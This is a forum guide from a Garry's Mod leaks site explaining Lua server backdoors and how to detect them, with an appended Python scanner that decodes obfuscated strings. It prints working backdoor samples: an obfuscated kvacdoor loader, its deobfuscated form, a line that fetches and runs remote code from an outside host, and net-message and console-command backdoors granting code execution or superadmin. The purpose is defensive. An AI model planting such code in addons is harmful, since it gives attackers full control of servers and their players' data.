Garry's Mod Leaks

[Info] (UPDATED) backdoors, how they work and how to find them

Submitted by Poggers kekw, Thread ID: 268798

09-07-2023, 07:02 PM
#1
What Are Backdoors?

Backdoors are a snippet of code that give an attacker full server access to your server.

Why should I care?

Having full server side access can be very harmful, because with server side access attackers can: ruin your economy, get everyone's IPs, get all of your addons, put ads outside of clients' screens making the attacker money (this has happened before), hold you, your server, or your files ransom, and run visuals on your server.

How do they work?

There are many types of backdoors; here are some: web panels, web hooks, net strings, and concommands. I'll start with web panels. Web panels use an HTTP request to request a page and run code from that page; the thing that makes web panels web panels is that they can control your server from the website. Web hooks are just like web panels, but they inform the attacker of your server name, server password (if there is one) and net string. They can't control your server from the web hook (most of the time) but they still have serverside access. Net strings are just nets that can run code on the server or run console commands. This requires the attacker to be on the server to run it, and they don't get notified if your server runs the backdoor. Concommands are malicious console commands that can: give superadmin, unban accounts, give money or ban people. This is usually a very beginner tactic.

What does a backdoor look like?

There are 2 types of backdoors: function and global (this is not actually correct but it's how I sort them). Function based backdoors are the simplest: they use some code executing functions to run and execute code, for example RunString, RunStringEx (same thing as RunString), and CompileString. Global based backdoors are a lot harder to find. They use global variables to call all the functions in a table form, then call code executing functions from that table. For example: _G calls the global table, and to call RunString from _G you do _G["RunString"]. The thing that makes global based backdoors hard to find is that you call the code executing functions as a string from global, so you can encrypt the string and make it unsearchable. Some global variables are: _G, debug.getfenv(), debug.getregistry().


How do I stop them?

Most backdoor blockers use a tactic called "detouring." Detouring is when you preserve a vanilla Lua function and overwrite that function, letting you change it and add code to it while calling the preserved function inside of the overwritten one. Example:
Code:
local preserved_runstring = RunString -- keep a reference to the original function
function RunString(code, identifier, error_handler)
     print(code) -- log every piece of code that is passed to RunString
     -- hand the call on to the original so normal behaviour (and its return value) is kept
     return preserved_runstring(code, identifier, error_handler)
end
This code debugs RunString and prints any code executed with it. Blockers will search the "code" parameter and check if anything malicious is trying to get through, and will not execute the preserved RunString if it is malicious.

How do I find them?

Use a program like Sublime Text or Visual Studio, drag the leak folder onto the program, right click it and click 'search folder'. There you can search strings to find any function or global based backdoor. Here are some strings you can search: RunString, CompileString, http., _G, getfenv, getregistry.

Are there any examples?
Yes! The most common backdoor is kvacdoor's smart lua inject; this backdoor is everywhere on NulledBB. Here's what it looks like:
(Code found in lua\autorun\server\npc_help.lua)

Code:
local function HELPER_INFO()
return ""
end

local function HELPER_ISFUNC(func)
if (isfunction(func)) then
return !false
else
return !true
end
end

local function HELPER_READ_DATA(data)
return file.Read(data, "GAME")
end

local UNORDERED_LIST =
{
"\x6d","\x61","\x74",
"\x65","\x72","\x69",
"\x61","\x6c","\x73",
"\x2f","\x6e","\x70",
"\x63","\x2f","\x68",
"\x65","\x6c","\x70",
"\x2e","\x76","\x74",
"\x66"
}

local function HELPER_MAT()
if (!false) then
return string.Implode("", UNORDERED_LIST)
end
end

local CALL =
{
ClearBackgroundImages, ClientsideModel, ClientsideRagdoll, ClientsideScene,
CloseDermaMenus, collectgarbage, Color, ColorAlpha,
ColorRand, ColorToHSV, CompileFile, CompileString,
ConsoleAutoComplete, ConVarExists, CreateClientConVar, CreateConVar,
CreateMaterial, CreateParticleSystem, CreatePhysCollideBox, CreatePhysCollidesFromModel,
CreateSound, CreateSprite, CompileString, CurTime,
DamageInfo, DebugInfo, DeriveGamemode, Derma_Anim,
Derma_DrawBackgroundBlur, Derma_Hook, Derma_Install_Convar_Functions, Derma_Message,
Derma_Query, Derma_StringRequest, pcall,
}
CALL[35](CALL[12](HELPER_READ_DATA(HELPER_MAT()), HELPER_INFO(), 0))

The deobfuscated code being:

Code:
pcall(CompileString(file.Read("materials/npc/help.vtf","GAME"), "", 0))

This code runs the code in the file "materials/npc/help.vtf" in the addon, which contains:

Code:
timer.Simple(1, function() http.Fetch("https://kvcdoor.ovh/f.php?key=key", function(b) RunString(b, ":", false) end)end)

There are some backdoors that are targeted, like the net string and concommand backdoors, examples being:

Code:
util.AddNetworkString("Backdoor net")
net.Receive("Backdoor net", function()
RunString(net.ReadString()) -- runs whatever string the sender puts in the net message
end)
(this is the most common type of net string backdoor)

And the concommand backdoor:

Code:
concommand.Add("backdoor",function(ply,cmd,args)
  RunString(string.Implode("",args))
end)
(RunString is not commonly used with these)

Code:
concommand.Add("backdoor",function(ply)
ply:SetUserGroup("superadmin")
end)

What can NulledBB and other forums do to stop backdoors?

Take inspiration from Unknown Cheats and have a moderated upload system. What this means is NulledBB hosts the download links and moderators can manually check for backdoors, then approve or disapprove leaks.


Do any addons block backdoors?

Yes, addons such as CPE and Lost's Tomfoolery (found here)



Thanks for taking your time to read this informative narrative. Please like or +rep me if you found this useful.

Lost Programmer
My messages are open, ask me anything!
My Github
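As an added example (not code from this thread or from any of the addons it names), the following Python script automates the "search folder" step from the post and goes one step further: it decodes Lua "\xNN" / "\ddd" escapes and joins string-only tables, so a function name or file path that the "global based" style hides as an escaped or split string becomes searchable again. It assumes it is run against an unpacked addon folder; the sample files, their names and the "hidden.lua" backdoor are constructed for the demo, and the kvacdoor sample is condensed from the one posted above (only the string table and the final call are kept).

```python
r"""Constructed example: a static scanner for the search strings the post lists
under "How do I find them?", extended to decode Lua escape sequences so code
hidden as "\x52\x75..." strings becomes searchable. Not a tool from the thread."""
import re
import tempfile
from pathlib import Path

# The post's search strings, plus RunStringEx (the post calls it an alias).
INDICATORS = ("RunString", "RunStringEx", "CompileString", "http.", "_G", "getfenv", "getregistry")
# A Lua short string literal: "..." or '...' with backslash escapes inside.
LUA_STRING = r'"(?:\\.|[^"\\])*"|\'(?:\\.|[^\'\\])*\''
STRING_LITERAL = re.compile(LUA_STRING)
# A table made only of string literals, like the UNORDERED_LIST table that the
# kvacdoor loader joins with string.Implode("") at run time.
STRING_TABLE = re.compile(r'\{\s*((?:(?:' + LUA_STRING + r')\s*,?\s*)+)\}')
# One Lua escape: \xNN, \ddd, or a single escaped character.
ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{2}|\d{1,3}|.)', re.S)
SIMPLE_ESCAPES = {"n": "\n", "t": "\t", "r": "\r"}


def decode_escapes(text):
    """Replace Lua escape sequences with the characters they stand for."""
    def repl(m):
        esc = m.group(1)
        if esc.startswith("x"):
            return chr(int(esc[1:], 16))
        if esc.isdigit():
            return chr(int(esc) % 256)
        return SIMPLE_ESCAPES.get(esc, esc)  # \\ \" \' stand for themselves
    return ESCAPE.sub(repl, text)


def literals_in(source):
    """Every string literal in the source, quotes stripped and escapes decoded."""
    return [decode_escapes(m.group(0)[1:-1]) for m in STRING_LITERAL.finditer(source)]


def joined_string_tables(source):
    """Each string-only table joined into one string, as string.Implode("") would."""
    return ["".join(literals_in(m.group(1))) for m in STRING_TABLE.finditer(source)]


def scan_source(source):
    """Return (how_found, detail) pairs for one Lua file's text."""
    findings = []
    decoded = literals_in(source)
    tables = joined_string_tables(source)
    for ind in INDICATORS:
        if ind in source:
            findings.append(("plain", ind))
        elif any(ind in s for s in decoded):
            findings.append(("escaped-literal", ind))
        elif any(ind in s for s in tables):
            findings.append(("split-table", ind))
    # Also show every reconstructed table: that is where hidden paths and URLs live.
    findings.extend(("reconstructed-table", t) for t in tables)
    return findings


def scan_folder(root):
    """Scan every .lua file under root; return {relative path: findings}."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*.lua")):
        found = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            report[path.relative_to(root).as_posix()] = found
    return report


# Constructed samples: the kvacdoor loader from the post condensed to its string
# table and final call (CALL cut to the entries indexed), an invented "global
# based" backdoor of the kind the post describes, and ordinary addon code.
SAMPLES = {
    "npc_help.lua": r'''
local UNORDERED_LIST = {
"\x6d","\x61","\x74","\x65","\x72","\x69","\x61","\x6c","\x73","\x2f","\x6e",
"\x70","\x63","\x2f","\x68","\x65","\x6c","\x70","\x2e","\x76","\x74","\x66" }
local function HELPER_MAT() return string.Implode("", UNORDERED_LIST) end
local CALL = { CompileFile, CompileString, pcall }
CALL[3](CALL[2](file.Read(HELPER_MAT(), "GAME"), "", 0))
''',
    "hidden.lua": r'''
local fn = "\x52\x75\x6e\x53\x74\x72\x69\x6e\x67"
_G[fn](net.ReadString())
''',
    "greet.lua": r'''
hook.Add("PlayerSay", "greet", function(ply, text) print(ply:Nick(), text) end)
''',
}


def demo():
    """Write the samples into a throwaway addon tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        srv = Path(tmp, "lua", "autorun", "server")
        srv.mkdir(parents=True)
        for name, src in SAMPLES.items():
            (srv / name).write_text(src)
        return scan_folder(tmp)


if __name__ == "__main__":
    for path, findings in demo().items():
        print(path + "".join(f"\n  [{how}] {detail}" for how, detail in findings))
```

Run it as is to see the demo report, or call scan_folder() on a real unpacked leak folder. On the kvacdoor sample a plain search only ever sees CompileString; the "reconstructed-table" line is what tells you the loader reads "materials/npc/help.vtf", a texture file that should never be fed to CompileString. Anything flagged still needs a human to read the surrounding code, since legitimate addons do use http. and CompileString.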

RE: [Info] (UPDATED) backdoors, how they work and how to find them

#2
Nice guide will keep, thanks for the info bro.

RE: [Info] (UPDATED) backdoors, how they work and how to find them

#3
Very informative, thanks.

There is also this (https://gmbrblog.blogspot.com/2020/08/de...-gmod.html); if you can use translate on it, it is also a good read.
